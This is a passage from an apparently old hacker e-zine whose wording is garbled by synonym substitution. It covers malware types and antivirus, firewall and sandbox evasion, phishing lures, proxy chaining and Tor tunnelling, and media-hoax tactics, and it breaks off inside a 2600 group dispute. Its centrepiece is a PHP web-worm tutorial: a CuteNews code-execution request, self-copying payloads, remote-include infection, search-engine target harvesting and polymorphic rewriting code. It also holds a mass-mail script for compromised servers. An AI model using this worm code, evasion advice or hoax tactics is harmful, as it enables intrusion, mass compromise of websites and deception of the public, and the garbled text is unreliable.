the password, and the corporate loses all the information on the programmer's field. 0->2) Kinds of malware. I) Virii. a) Overwriters, these are fairly frequent within the viral world. They only exchange the hostprogram with themselves, erasing this system. b) Companions, these virii do not alter the hostfile, they disguise them from the person and rename them, taking their place and executing the host after they're finished. c) Bootsector virii, these virii infect a HD or floppy bootsector, initiating themselves at every startup, with out person interplay, making them fairly powerfull. d) Prependers, these virii place their code in entrance of the sufferer code, executing themselves earlier than the sufferer code can, thus not notifying the sufferer of lacking information. e) Appenders, the identical as prependers, solely they execute after the sufferer code. f) Reminiscence-resident, these kind of virii use TSR methods (Terminate and Keep Resident), to stay within the field' reminiscence (often by interupt hooking) till one thing occurs (a .exe file is opened) after which they infect information this manner. g) Encrypted virii, to idiot scanners within the outdated days, virii used to encrypt their opcode our bodies, and decrypted themselves throughout runtime. This system has advanced a great distance (see beneath). h) Oligomorphic virii, these virii are encrypted virii, who change their decryption/encryption key at each replication, thus making it tougher for a virus scanner to detect them. i) Polymorphic virii, a fairly superior method, these little devils substitute entire opcode blocks with blocks that look totally different, however do the identical. j) Metamorphic virii, one of many latest methods to idiot AV's, these virii exchange complete blocks of logic of their our bodies. They exchange 3 with (1+2) or (6 / 2) or (((2 * 2) +2) / 2) for instance. ok) EPO virii, entry level obscuring (or obfuscating) virii place their code physique someplace random contained in the host's physique, and modify the host to leap to the level the place the virus begins, thus forcing AV's to scan complete information, slowing them down. l) Cross-infection virii, these virii infect a number of file sorts, thus rising their effectiveness. m) Cryptovirii, these are comparatively uncommon, encoding complete harddrives with a publickey algorithm, and forcing the sufferer to pay the viruswriter ransommoney to decode his/her HD (additionally referred to as Ransomware). II) Worms. a) Massmailing, these worms harvest e-mail adresses from a field (both from WAB information, messenger contact lists or different addressbook information) and mail themselves to them to propagate, they are going to journey around the globe actually fast, however will entice virusanalyst's consideration actually quickely too, making them considerably blasŽ (and unsubtle) in my view. b) P2P, these worms unfold trough peer-to-peer software program, propagating as well-liked filenames (music, films, footage, applications, and many others), these might go practically as quick as Massmailers (so long as they ensure that they preserve propagating as information which are nonetheless well-liked) and much more silent. c) I-Worms, Web worms are a particular case, the very first worm, the morris-worm, was additionally an internetworm, nevertheless it took greater than 15 years earlier than the second I-Worm appeared. I-Worms are sometimes called Warhol-worms, derived from Warhol's prediction that sooner or later everyone might be well-known for 15 minutes. I-Worms journey by exploiting safety gaps, like Morris' sendmail bug. Code-Crimson,Nimda, Sasser and Zotob are all Warhol worms (I-worms) and are extraordinarily successfull. d) Botnet worms, these worms operate a bit as a trojan too. They use the sufferer's field as a zombie, permitting the attacker to remotely use the sufferer's laptop to ship spam, log passwords and launch ddos assaults. e) Neural-Community worms, I've by no means heard of 1 seen within the wild, simply as a poc (proof of idea). Also known as Curious Yellow worms, these worms talk with one another with a view to change info over potential victims, new exploits to make use of to propagate and new anti-antivirus methods. These worms might harbor a self-improving/self-rewriting mechanism, making them nearly invincible. However it will take a gaggle of very skilled A.I. Scientists to code such a worm. III) Trojans. a) R.A.T's The preferred of trojans, these applications enable an attacker to remotely management the contaminated field, gathering delicate data, or utilizing it to launch ddos assaults, use it as a tunnel to root different bins or to anonymously launch new viral epedemics. b) Rootkits I do not know if these may be thought-about trojans, however they're (in my view) finest categorised right here. Rootkits enable a distant attacker stealthy entry to a field, hiding processes, directories, information and further accounts. b) different Any program, disguising itself as one thing else, may very well be thought-about a trojan. IV) Adware a) Homepage/Searchpage Hijackers These applications change your homepage and searchpage to a web page of the writer's alternative. b) Dialers Dialers abuse the sufferer's dialup connection to dial to a really costly quantity someplace overseas, producing cash for the writer. c) Behavior-trackers These applications observe your surfing-habits, promoting belongings you ( in keeping with your browsing) need. d) Keyloggers May be categorised underneath trojans. Keyloggers monitor your keystrokes, stealing your passwords and sending them to a distant attacker for his objectives. V) Logic Bombs see rationalization in 0->1. 1) Summary ideas Now we all know some primary malware ideas, we are able to delve additional in principle about malware growth. 1->1) Survival Idea First we have to know what's vital for malware to outlive. Properly, listed here are some vital issues: I) Spreading A very powerful characteristic of most malware is to unfold so far as potential, infecting a variety of information/bins. II) Effectivity Doing what it's designed for is in fact extraordinarily vital. For some worms it will be taking down a web site, or for adware it will be monitoring surfer habits. III) Stealth Not being detected by AV's is essential in surviving. If malware is detected it quickly turns into unusable and dies. 1->2) Survival Concept I) Spreading Spreading may be finished in some ways. As described in 0->2, malware can tackle many propagation types. Crucial when spreading is part of social-engeneering. Sending a mass-mail like: ----------start of mail--------------------- Topic: dfjadsad Physique: Hello, open the attachment Attachment: blah.exe --------end of mail--------------------- would not attact many individuals. It's boring. A mail like this nonetheless: ----------start of mail--------------------- Topic: Your Credit score Card has been charged Physique: Expensive [email protected], Your buy of the $1000 bodyset-deluxe was sucessfull, your credit-card has been charged accordingly, examine the attachment for particulars. Yours sincerly, The E-Bay staff. Attachment: Particulars.doc.exe --------end of mail--------------------- would entice extra folks, they might be wanting to see what has occurred to them, no person needs to be charged for one thing they have not purchased. This goes for the P2P manner too, information like StarWars - Revengeofthesith.avi.exe unfold sooner than blah.exe. Additionally, most individuals really feel safer if a file is zipped. Properly, together with a zip-component in your malware, to zip it everytime it replicates is not that tough. II) Effectivity There at all times must be a fragile stability between spreading,stealth and effectivity. Spreading like mad will get your malware very far, however it is going to be detected in a matter of hours, making it out of date, whereas excessive stealth would possibly preserve your malware undetected for years, nevertheless it will not infect greater than 10 bins. Being environment friendly completely will depend on your objectives. III) Stealth Malware has many enemies, listed here are a few of them: a) AV's b) Firewalls c) AV researchers fooling AV's is not too dificult, generally switching two or three bytes is sufficient to idiot them, however your virus will get detected once more and all might be for nope. So it's worthwhile to defend your malware from AV's. Thus encryption,Oligomorphism,Polymorphism and Metamorphism are born. For all cryptographers on the market, let go of the basic thought of encryption, Viral encryption is one thing totally different. Encryption,Polymorphism,Oligomorphism and Metamorphism for executables is simply potential in meeting, so begin studying it! Fooling firewalls will also be finished fairly simply, simply terminate their processes! Though that is fairly impolite and unsubtle, it's efficient. A extra refined manner is including your program to their trustedprogram-list. Fooling an AV researcher may be fairly tough. They are going to disassemble your virus, Emulate it is code and Sandbox it. Making your virus extraordinarily complicated, with lengthy loops and jumps will preserve them from totally understanding it by disassembly. Stopping Emulation is sort of tough, you would need to examine if your code is being emulated by making a change, and checking if that change actually has been utilized, if not, you're being emulated. Sandboxing is a tehcnique that includes placing your virus in a digital machine with some baitfiles to see what it does. This may very well be overcome by checking for VMware, Digital Laptop, and many others. I'll give particulars later. 2) Code Apply. Earlier than beginning this part I assume the reader is conversant in commonplace programming principle,viral principle and several other (script)languages, resembling c++,Pascal,Vbs,Js, batch and a few assembler would assist too. All assembler supply examples might be in 16-bit assembler, since these are primarily for instructional functions, their outdated nature will practically robotically SK-Proof it, nonetheless, anybody conversant in 16/32- bit assembler can convert the examples to swimsuit the win32 platform. This part will include viral code. I'm not answerable for any harm finished by any of those applications, nor do I promote releasing them. I've divided the Code Apply in a number of sections as follows: I) Easy Exe Virii II) Batch Virii III)Script Virii IV) Reasonable ExeVirii/Worms V) Idea Virii ( Pattern code may be discovered on-line at http://www.hackthissite.org/zine/ ) [ ---------------------------------------------------------------------------- ] [ proxy chaining, tunnelling and tor................. by outthere and kuroishi ] [ ---------------------------------------------------------------------------- ] The creation of nameless networks like Tor based mostly on assymetric key cryptography and onion routers do make conventional proxy companies appear quite quaint, however conventional nameless proxy companies are nonetheless fairly helpful for IRC, leap bins, and basic web tomfoolery, regardless of the threats from honeypots. A proxy is a chunk of software program that makes requests on behalf of a consumer to distant assets. This text goes into quick, sensible summaries of a number of prevelent proxy protocols obtainable accross the web. Authorization and identification procedures are principally ignored, since open proxies are so frequent and to maintain the article quick and sensible. === CGI Proxies === CGI proxies merely fetch net pages and sometimes FTP or different information based mostly on user-supplied enter, which is often only a GET variable. For instance, http://foo.bar/p.php?url=http://www.hackthissite.org/ The reliability and switch charges of those companies are sometimes fairly excessive, and may be simply strung collectively instantly from the URL in lots of instances, like so: http://foo.bar/p.php?url=http://bar.foo/url.cgi?u=http://www.hackthissite.org/ Many language translators additionally operate on this capability, however sadly they usually ship an X-Forwarded-For header figuring out the sender's IP deal with. === HTTP Proxies === HTTP Proxies are fairly easy. The consumer sends a daily HTTP request to the proxy server with an absolute URI. Due to this fact, what would usually be: GET / HTTP/1.1 Host: www.hackthissite.org when connecting on to the hackthissite.org server turns into: GET http://www.hackthissite.org/ Host: www.hackthissite.org when connecting via a proxy. A clean line after the final header establishes the tip of the request (until a Content material-Size has been specified, as is typical for a POST). The request then goes proper on via as if the vacation spot had been instantly related to. Straightforward. Sadly, some http proxies are configured to ship sure personally figuring out info to the distant methods. * Clear proxies ship the consumer IP deal with within the X-Forwarded-For header and different headers affirming the usage of a proxy server. * Nameless proxies ship out headers stating that the server is a proxy, however do not ship out the consumer's IP deal with. * Excessive anomnity, or "elite" proxies do not ship out any info that identifies the service as a proxy to the vacation spot. === HTTP CONNECT === Join proxies have been created as an extension to HTTP proxies as a method for establishing persistent connections for protocols resembling IRC. They're comparatively easy as properly. For example: CONNECT irc.hackthissite.org:6667 HTTP/1.1 will set up a connection to the HTS IRC server on port 6667. The server will reply with an HTTP-formatted standing message, and if the request was profitable, information may be despatched and acquired freely. As a result of join is an extention to the HTTP protocol, including additional traces like a Host or a Person-Agent will work simply tremendous, however for many functions is pointless. === SOCKS4 === Socks4a is an extension to the unique socks4 to supply DNS lookup on the proxy facet. First, the consumer sends a request like so: * x04 - socks4 model identifier * x01 - command; 1 is join * x00x50 - port expressed as 16 bit huge endian: x00x50 could be port 80 In Perl, pack("n", $port) will convert the integer $port to 16 bit huge endian. * xc0xa8x06x47 - 4 bytes specifying the vacation spot IPv4 deal with: the 4 bytes proven would equate to 192.168.6.71. Use x00x00x00x01 if the proxy is to do the DNS lookup itself. (Any non-zero for the final octet will do.) * rawrx00 - null-terminated USERID string, these are sometimes in comparison with IP addresses or IDENT replies as a primative type of authentication, however not often. More often than not this string is ignored, so put one thing random. * hackthissite.orgx00 - null-terminated area identify, only a null byte if a legitimate IP was offered earlier The socks4 server then sends a reply like so: * x00 - model of the reply code, ought to at all times be 0 * x5A - request granted OR x5B - rejected or failed OR x5C - rejected as a result of cannot connect with identd on the consumer OR x5D - rejected as a result of identd and the consumer report totally different IDs * x00x50 - vacation spot port, ignore * xc0xa8x06x47 - vacation spot IP, ignore After these steps write on to the socket as if the consumer was instantly related. === SOCKS5 === Socks5 was developed to supply each UDP and TCP, robust authentication, DNS, and IPv6 from the bottom up. First off, the consumer sends a model identifier/technique choice message: * x05 - socks5 model identifier * x01 - variety of strategies to strive; for our functions, one will suffice * x00 - strategies; x00 is not any authentication required The server will then reply: * x05 - socks5 model identifier * x00 - chosen technique; if that is xff then the consumer should disconnect If every thing went properly, the consumer then sends a socks5 request: * x05 - socks5 model identifier * x01 - command (x01 for join) * x00 - reserved, go away null for now * x01 - deal with kind, x01 for IPv4 OR x03 - for a site identify OR x04 - for IPv6 * xc0xa8x06x47 - 4 octets specifying the deal with for IPv4 OR 16 octets for an IPv6 deal with OR 1 byte specifying the string size then the area identify for DNS * x00x50 - vacation spot port, x00x50 is port 80 The server replies with: * x05 - socks5 model * x00 - reply subject, x00 for profitable OR x01 for basic socks server failure OR x02 for connection not allowed OR x03 for community unreachable OR x04 for host unreachable OR x05 for connection refused OR x06 for time to dwell expired OR x07 for command not supported OR x08 for deal with kind not supported OR x09 to xff for unassigned * x00 - reserved, at all times x00 * x01 - deal with kind, similar values as in request * xc0xa8x06x47 - certain deal with * x00x50 - certain port, does not actually matter for a join request Then the transaction continues as if the consumer have been instantly related. === Chains, Closing Notes === For added anomnity, a number of proxies may be strung collectively in a course of identified as chaining. In proxy chains, the consumer instructs proxy servers to connect with subsequent proxy servers till the vacation spot. This system can significantly enhance anomnity, however might lower throughput and improve latency. Apparently, Tor is nothing greater than a socks4a proxy service so far as the consumer is worried, which brings in the potential for utilizing Tor conceptually as simply one other hyperlink in a series. Extending Tor exit nodes with open proxies additionally opens up the potential for getting round Tor restrictions on some networks whereas sustaining encryption and anomnity, as it's a lot simpler to block Tor than to dam the large variety of open proxies on the web, particularly these on non-standard ports. Reader, beware. Many proxies are run by phishers, over-zealous community directors, or regulation enforcement companies that log every thing. All the time use extra than one layer of anomnity and by no means ship unencrypted personally identifyable info via public proxy servers. http://proxy-glue.sourceforge.web/ [------------------------------------------------------------------------------] [ tunnelling and tor ................................................ kuroishi ] [------------------------------------------------------------------------------] Tor is the Onion Routing Protocol, a undertaking being developed by the Digital Freedom Frontier (EFF) for anonymity and privateness safety on the web. It breaks up your packets and spreads them over the whole Tor community, encrypted, to finish factors around the globe, the place they're reassembled and despatched to their meant vacation spot. Tor can be utilized to guard your id when searching the net, chatting, or when doing tremendous enjoyable no-no stuffs ;D. First, set up Tor. Tor is obtainable from the EFF, at tor.eff.org. Set it up in your OS of alternative. You may additionally most likely need Privoxy, directions on configuring your HTTP Proxy (privoxy) to make use of a SOCKS proxy (tor), see the Tor web site. To make use of Tor to anonymize your net searching, open your browsers proxy settings. If you happen to're utilizing each Tor and Privoxy you will wish to level your http proxy to localhost, port 8118. If you happen to're utilizing Firefox, you will wish to examine the field that says "Use the identical proxy for all protocols." If you happen to're not utilizing Privoxy (simply Tor), set your SOCKS v4 proxy to localhost, port 9050. Verify if it is working by going to http://whatismyip.com. (a observe for Firefox customers: there's a useful Firefox extension referred to as ProxyButton. It permits you to toggle your proxy on and off rapidly out of your toolbar. I like to recommend this extension in case your doing severe webhacking ;D) You possibly can arrange different purposes to route site visitors via tor. Direct SOCKS proxies via localhost port 9050. However generally you might wish to use Tor for an utility that doesn't have SOCKS help, that is the place socat is available in useful. Socat is a great tool for coping with socket connections and tunnels. I've written a fast script, referred to as torbind to deal with socat for us. #!/bin/bash # Utilization: ./torbind [local port] [remote host] [remote port] socat TCP4-LISTEN:$1,fork SOCKS4A:localhost:$2:$3,socksport=9050 Say we wish to telnet to a distant host over tor. Utilizing socat we might do that: $ ./torbind 1337 h4x3db0x0r.com 12345&; telnet localhost 1337 Linked to h4x3db0x0r.com port 12345. Password?: or IRC: $ ./torbind 7000 irc.hackthissite.org 7000&; irssi /server -ssl localhost 7000 You possibly can route any port on native host to any port on any vacation spot via tor. You possibly can determine the best way to use this by yourself ;D. Say your hacking on the street. It's worthwhile to use a library or college pc to do some severe buisness. You possibly can't set up Tor as a result of sure restrictions, or simply as a result of time. A pleasant fast n' soiled manner of getting nameless safety is to make use of an SSH tunnel. Any SSH consumer can route site visitors via a SOCKS tunnel to your ssh server. When you've got Tor and Privoxy working in your server you may route your site visitors out via that. In Linux or MacOS simply do for instance: [email protected] $ ssh -L12345:localhost:8118 [email protected] Password: [email protected] $ Again at localhost now you can set your http proxies to localhost:12345. This will bounce site visitors via your ssh session to your server, and out via Tor for full fast anonymity. In home windows, you may arrange an SSH tunnel utilizing PuTTY. In PuTTY Config, underneath SSH, go to Tunnels and Add a brand new forwarded port, set supply port, like above one thing arbitrary, say 12345. Vacation spot must be localhost:8118 (for Privoxy, with out privoxy, use port 9050, for SOCKS.) Now connect with your SSH server, authenticate, and you need to have the ability to set your HTTP or SOCKS proxy to localhost, port 12345. You additionally configure the unix command line ssh consumer to bounce via tor. Set up join.c at /usr/native/bin/join and add the next to your ssh_config file. Alternatively, you may write shell scripts to automate the strategy of alternating between tor ssh and non tor ssh. Host * ProxyCommand /usr/native/bin/join -4 -S 127.0.0.1:9050 %h %p (must have /usr/native/bin/join ) sshtor.sh: #!/bin/bash cp /sw/and many others/ssh/ssh_config.tor /sw/and many others/ssh/ssh_config sshnontor.sh: #!/bin/bash cp /sw/and many others/ssh/ssh_config.nontor /sw/and many others/ssh/ssh_config !!!!!!!!!!!!!!!! !!! ACTION !!! !!!!!!!!!!!!!!!! [------------------------------------------------------------------------------] [ the art of writing a web worm in php ....................................... ] [------------------------------------------------------------------------------] * Introduction * Automation * Goal Gathering * Evading IDS, Polymorphism, and Communication * Closing Phrases **** Introduction ***** This text makes use of some particular examples from an unreleased net worm that will unfold itself via susceptible php scripts. The worm is known as World Cant Wait and would publish an announcement of the November 2nd Drive Out the Bush Regime protests on hundreds of message boards and weblog engines. The unique made use of a personal vulnerability however the methods described right here use the lately disclosed php code execution vulnerability in CuteNews 1.4. We have been taking part in round with automating this exploit to search out targets and replicate itself as a programming train whereas we have been toying with the thought of covertly releasing it within the buildup to the protests to get folks to the streets and provides tooth to the motion. Ultimately we determined that as an alternative of risking authorized issues and trashing a bunch of methods, we'd strengthen our motion by explaining the methods and launch the code in modules to assist arm future php worm revolutionaries. Though we left some intentional bugs and took parts of the code out, the snippets beneath can be utilized to construct a damaging worm. Acknowledge the implications of getting concerned with such actions and do not make ourselves into the violent and damaging hackers the media tries to color us as. The wonder and genius of a worm is in writing the code itself, not what number of methods it could mess with. So let's get to it, and keep in mind - coding will not be against the law. **** Automation **** Discover a vulnerability and write a self-automated goal gathering and exploitation engine. Internet based mostly vulnerabilities are predictable, can collect targets via engines like google pretty simply, and may be exploited robotically by forging a sequence of HTTP requests. whereas ($cease == false) $listing = gather_targets(); for ($i=0;$i<depend($listing);$i++) echo " [x] targetting $listing[$i]...n"; if (!is_infected($listing[$i])) infect($listing[$i]); $cease = true; With the intention to have an online based mostly worm unfold, it's worthwhile to automate the exploitation course of. This may be finished by utilizing PHP's socket capabilities to determine connections to the net server and sending http information. This operate demonstrates how a PHP script can connect with a server, ship information, and return the response: operate make_request($area, $packet) $fp = @fsockopen($area, 80, $errno, $errstr, 10); if (!$fp) return false; fwrite($fp, $packet); whereas (!feof($fp)) $textual content.= fgets($fp); fclose($fp); Then it's only a matter of forging a correct HTTP request which is able to exploit the vulnerability and get it to run a duplicate of itself on the contaminated system. CuteNews writes info to information/flood.db.php when somebody posts feedback to a information article. You possibly can insert PHP code to this file by passing information within the Shopper-Ip HTTP header. $packet = str_replace("n","nr", "POST $location/example2.php?subaction=showcomments&id=1128188313&archive=&start_from= &ucat=& HTTP/1.1 Settle for: */*rnAccept-Language: en Settle for-Encoding: gzip, deflate Shopper-Ip: <?php echo "arbitrary php code to be executed!!"; ?> Person-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.6 (KHTML, like Gecko) Safari/412.2 Content material-Kind: utility/x-www-form-urlencoded Content material-Size: 107 Connection: shut Host: $area identify=haxitup&mail=&feedback=j00+haxed+%3Alaughingpercent3A&submit=Add+My+Remark& subaction=addcomment&ucat=&present= "; If we make a few these requests, it can write the PHP code from Shopper-IP to flood.db.php. Then we are able to name flood.php from a regular GET request to execute the code. Now that we are able to automate the method of executing PHP code on a given server, we are able to begin desirous about some code that may replicate the worm in addition to delivering our payload. This instance will copy the whole worm code to 'sekret.php' on the susceptible server, able to be run. You possibly can add any payload on the finish of Shopper-Ip, from working sekret.php to including a line on the high of stories.txt which is able to make a information publish on each susceptible CuteNews website ;) ;) $supply = str_replace("$", "$",str_replace(""", """,str_replace("", "\",file_get_contents($_SERVER['PHP_SELF'])))); ... Shopper-Ip: <?php $fp=fopen("sekret.php", "w");fwrite($fp, "$supply");fclose($fp); ?>rn ... ... for ($i=0;$i<2;$i++) $bob = make_request($area, $packet); make_request($area, "GET $location/information/flood.db.php HTTP/1.1rnHost: $domainrnConnection: closernrn"); Different An infection Methodology: PHP Inclusion It's not tough to automate the method of PHP embrace associated vulnerabilities both. Poorly written PHP scripts generally have bits of code much like <?php embrace $web page; ?>, which is susceptible in lots of conditions to distant PHP code execution by passing the URL to a little bit of PHP code because the GET variable 'web page'. Our worm can copy itself to some place on the net root and cross the URL to an HTTP GET request to execute itself on one other server. $fp = fopen("sekret.txt", "w"); fwrite($fp, file_get_contents($_SERVER['PHP_SELF'])); fclose($fp); $url = $_SERVER['SCRIPT_URI']; make_request($area, "GET /check.php?path=$url HTTP/1.1rnHost: $domainrnConnection: closernrn"); Different An infection Methodology: SQL Different An infection Methodology: JavaScript / XSS **** 3. Goal Gathering **** Through the growth of the worm, it will be smart to seperate the precise exploit code from the goal gathering code. Check by yourself machine or on a LAN utilizing code much like: operate gather_targets() return array("http://localhost/cutenews"); For the needs of net based mostly worms, it is sensible to make use of engines like google in order to extract potential targets. You possibly can simply write just a few queries that may produce URLs to websites working particular software program. This may be automated via web page scraping code to generate an array of targets which may be handed to your worm for an infection. $search = array("inurl:flood.db.php", ""powered by cutenews v1.3"", ""/cutenews/remote_headlines.php"", ""powered by CuteNews" "2003..2005 CutePHP"", "inurl:"/newsarchive.php?archive""); $question = $search[rand(0, count($search)-1)]; You possibly can scrape outcomes from main engines like google by making HTTP requests and wanting on the returned URLs. $fp = fsockopen("google.com", "80"); fwrite($fp, "GET /search?q=" . urlencode($question) . "&sourceid=mozilla-search&begin=0&begin=0&ie=utf-8&oe=utf-8&consumer=firefox-a&rls =org.mozilla:en-US:official HTTP/1.1rn Host: www.google.comrn Person-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.8) Gecko/20050511/1.0.4rn Settle for: textual content/xml,utility/xml,utility/xhtml+xml,textual content/html;q=0.9,textual content/plain;q=0.8, picture/png,*/*;q=0.5rn Settle for-Language: en-us,en;q=0.5rn Settle for-Encoding: gzip,deflatern Settle for-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn Connection: closernrn"); whereas (!feof($fp) AND (strpos($textual content, "2005 Google") === false)) $textual content.= fgets($fp); fclose($fp); whereas (!(strpos($textual content, "<a href="http://") === false)) $starttext = substr($textual content, strpos($textual content, "<a href="http://") + 9); $thenumber = substr($starttext, 0, strpos($starttext, """)); $textual content = str_replace("<a href="$thenumber">", "x", $textual content); if (strpos($thenumber, "google") === false) $vuln[] = $thenumber; print_r($vuln); **** Evading IDS, Polymorphism, and Communication **** You possibly can modify the supply of this system on the fly by making a number of discover and replaces within the code for every new iteration of the worm. PHP and different languages have a number of operate aliases that may be swapped to provide the identical outcomes. Take into account including extroneous PHP code as trash to confuse file sizes and coding similarities. Along with altering the names of variables in this system, you can even categorical values of numbers and strings in several methods. $random++; -> $random+= -2 + 3; $begin = "go"; -> $begin = chr(103) . chr(111); $num = depend($end result); -> $num = sizeof($end result); The next little bit of code revealed in 29a rewrites the supply utilizing new variable names. <?php $changevars=array('changevars', 'content material', 'newvars', 'counti','countj', 'trash'); srand((double)microtime()*1000000); $content material=fread(fopen(__FILE__,'r'),filesize(__FILE__)); $counti=0; whereas($changevars[$counti]) $content material=str_replace($changevars[++$counti], trash('',0), $content material); fwrite(fopen(__FILE__,'w'),$content material); operate trash($newvar, $countj) do $newvar.=chr(rand(97,122)); whereas (++$countj<rand(5,15)); return $newvar; ?> Randomizing information despatched within the http request, making it much less predictable. You possibly can embrace and select a random user-agent making it appear like actual customers. Otherwise you can modify the precise POST information in order that they are not all utilizing the identical values for every kind identify (just like the above cutenews instance). In case your worm will depend on a search engine like google to assemble targets, it'd be price contemplating diversifying your queries as to cut back the probabilities of being blacklisted and killing the worm. inurl would possibly discover a variety of pages, however intitle works as properly. Take into account randomizing the user-agent of your http requests or integrating a number of search engine help to maintain them confused and lengthen the length of the worm. Develop strategies of speaking with previous and future iterations of the worm, feeding it places of attacked bins. A decentralized technique of interworm communication can even assist the worm adapt itself by discovering(fuzzing) new exploits or being fed new assault vectors. **** Closing Phrases **** World Cant Wait was developed as a easy proof-of-concept on the planet of writing net based mostly worms that unfold via susceptible php scripts. Though the worm code was not designed to trash methods (the above code will not even work with out some modification) the ideas can be utilized to ship all types of payloads. Script kiddie worms have previously been used to assemble jumpboxes, harvest passwords, or ddos main methods, whereas others have really went and patched the safety gap of the susceptible software program. Others are toying with the thought of creating mass quantities of posts on guestbooks, blogs, and message boards to google bomb and manipulate google and different spidering methods. The probabilities are countless, and the actual genius is in creativity. Most individuals desirous about superior coding workout routines resembling writing worms are motivated by the problem of truly growing environment friendly code to automate the artwork of gathering targets and exploiting them. There isn't a larger and extra stunning coding train for effectivity and complexity than coding a worm. Even if writing code may be thought-about a prison act within the eyes of the state, curiosity on this stunning artwork has been round for many years and can at all times stay part of hacker tradition so long as we're in a position to develop them in a safe and accountable manner. [------------------------------------------------------------------------------] [ creating national media stunts ............................................. ] [------------------------------------------------------------------------------] coordinate with different nationwide actions, occasions, protests. discover one thing that will already be on folks's thoughts and add gas to the flames. trigger digital disruption: announce a phony mayor resignation, pose as your boss asserting raises for everyone, give folks reductions for cellphone gasoline web or public transit companies. make mass bulletins to mainstream and impartial media to publicize your actions. write a properly formatted press announcement lookup and call reporters or different members of the press. mass communication(collect media lists and ship mass emails, publish to indymedia, add information to p2p networks, file drops, or different well-liked archive websites. cowl your tracks, by no means use the identical identify twice, do not compromise with white hats or sellouts, embrace a variety of techniques, have enjoyable and do not get caught! Mass Mail Script: drop on a field and create a newline-seperated textual content file filled with emails to main newspapers, televiion and radio stations, congress, and many others. <?php $fromemail = "Identify Right here <[email protected]>"; $topic = "insert topic right here!"; $message = "insertnmessagenhere!"; $deal with = fopen("emails.txt", "r"); whereas (!feof($deal with)) $buffer = fgets($deal with, 4096); if ($buffer != "" AND $buffer != "n") echo "Ship to $buffer...n"; $a = mail ($buffer, $topic, $message, "From: $fromemail"); if ($a == false) echo "<font colour="pink">Unhealthy!</font> n"; echo "Completed.<br>"; fclose($deal with); ?><br><br>finished altogether! "France's Youth Battles Additionally Waged on the Internet" Washington Put up, November 10, 2005 Whereas riot police are trying to curb the gangs which have been setting fireplace to vehicles and buildings in France's poor suburban communities for the previous two weeks, French officers have solely simply begun the battle to manage a extra amorphous battleground: our on-line world. Web blogs have develop into so vicious and intense that police have opened investigations in opposition to two youngsters for inciting violence on radio station-sponsored blogs. Hackers took over the Website of the northern Paris suburb of Clichy-sous-Bois, the place the primary violence started Oct. 27, and dispatched hundreds of faux e-mails asserting the mayor's resignation. Native gangs have used textual content messaging on their cell telephones as early warning methods to alert members concerning the actions of riot police throughout operations of their communities, gang members mentioned in interviews. "CTA asks feds to probe e-mail hoax" Chicago Tribune, December 14th 2004 The Chicago Transit Authority at this time requested the FBI to analyze an e-mail despatched to media shops early this morning, falsely asserting free CTA rides to the public on Wednesday. The so-called press launch went out underneath CTA President Frank Kruesi's identify and was acquired by the Tribune and different information media at 3 a.m. It apologizes for pending service cuts, and "within the spirit of the vacations" declares "One Day of Free Journey" on buses and trains starting 5 a.m. Wednesday. Nothing may very well be farther from the reality, officers of the transit company mentioned at this time. "It is phony, and we've referred it to the FBI," mentioned CTA spokeswoman Noelle Gaffney. The e-mail, headlined "Riders Do not Pay, Employees Do not Acquire!" didn't originate with the CTA, and there might be no fare vacation, officers mentioned. [------------------------------------------------------------------------------] [ black and white chicago 2600 ............................................... ] [------------------------------------------------------------------------------] After an invite to check the safety of a number of of their methods we proceeded to root every of them and confirmed them the way it was finished as a result of on the time they have been curious and as to how their methods have been compromised. After Jeremy's place was raided by the FBI, the white hats acquired scared and confirmed their true colours, beginning to name us 'cyber-criminals' and 'digital vandals' and began to work with the FBI and ProtestWarrior to demonize, harass, and incriminate members of our group. By aiding the forces that work to destroy the hacking motion, Chicago "2600" has misplaced all credibility as a public hacking group. Over a interval of months, a number of self-appointed Chicago 2600 directors have acted in methods which endanger different hackers, abuse their energy, and in any other case undermine the spirit of hacking basically. * Turned over logs and different info to narc to folks's bosses with the profitable intent to get folks fired. * Has labored with regulation enforcement to supply testimony and freelance surveillance to assist the FBI's probabilities of conviction in addition to work with right-wing group ProtestWarrior to do counter-intelligence and public smear campaigns * Repeatedly censor and forestall folks from posting to the general public e mail listing once they do not agree with the posts or wish to disguise among the stuff they're doing. * Run a secret e mail listing for many who "make the actual selections concerning the group", which they've used to badmouth and conspire in opposition to different members * Moved conferences to a personal location the place they've banned a number of folks with threats of going to the police When approached about these violations, the directors preserve that "this will not be a democracy" and that they'll run their "non-public firm" any manner they select. Along with breaking various 2600 conventions, this kind of egotistical, authoritative philosophy undermines the open democratic spirit of hacking. Like many different hacking teams, 2600 has counter-culture roots and has at all times embraced dissenting opinions. 2600 has additionally acknowledged that hacking is inherantly political, and the way free know-how can be utilized to defend digital rights and free speech. The Fifth HOPE was held in NYC a month earlier than the Republican Nationwide Conference got here to city and had various political displays overlaying impartial media, the free software program motion, and even a speech speaking about civil disobedience on the upcoming RNC protests. 2600 has created a set of nationwide tips with a view to preserve native teams organized across the rules of freedom and democracy and to forestall power-hungry directors to abuse the remainder of the group. "Keep in mind that conferences are open to all as per the assembly tips. Your assembly CANNOT be "sponsored" by anybody or it isn't a 2600 assembly. Additionally, keep away from showing to be a decent knit group as this can solely discourage or intimidate new attendees. It additionally could be inaccurate - conferences are not any extra yours than they're anyone else's. Equally, your website ought to solely give attention to the assembly itself, not actions exterior of or after the assembly. If you happen to suggest that each one of the cool folks wind up doing one factor whereas the non-cool folks do one thing else, you are creating divisions and factions that don't have any place right here. For the similar cause, we strongly discourage any type of content material that mocks or places down any attendee(s)." On Aug 29, 2005, at 10:46 AM, narc <[email protected]> wrote: It was delivered to my consideration {that a} one Jeremy Hammond determined to make use of a server at your office to overtly categorical a vulnerability he was demo-ing in a public Web Relay Chat (IRC) channel. Attributable to latest encounters with this younger man, I've realized to query any motives of his to reveal this info, and as such, determined to contact you. Additionally, as I used to be making an attempt to find you, I additionally uncovered that Jeremy has been utilizing his e mail account for private enterprise to speak on public boards (Indymedia.org, Chicagoactions.org and HackThisSite.org got here up as preliminary outcomes). Upon additional evaluation of the scenario, I additionally famous that Jeremy is the webmaster for Macspecialist.com. As somebody who's a identified pc prison (ProtestWarrior, CUGNet, Chicago2600.web, and others that want to not be named have all been illegally accessed by Jeremy Hammond), I query his motives as webmaster and additional categorical concern for Macspecialist as an entire. Contained beneath is the IRC log of the occasions that transpired. Insurgency is Jeremy. Server: irc.chicago2600.web Channel: #chicago2600 From narc <[email 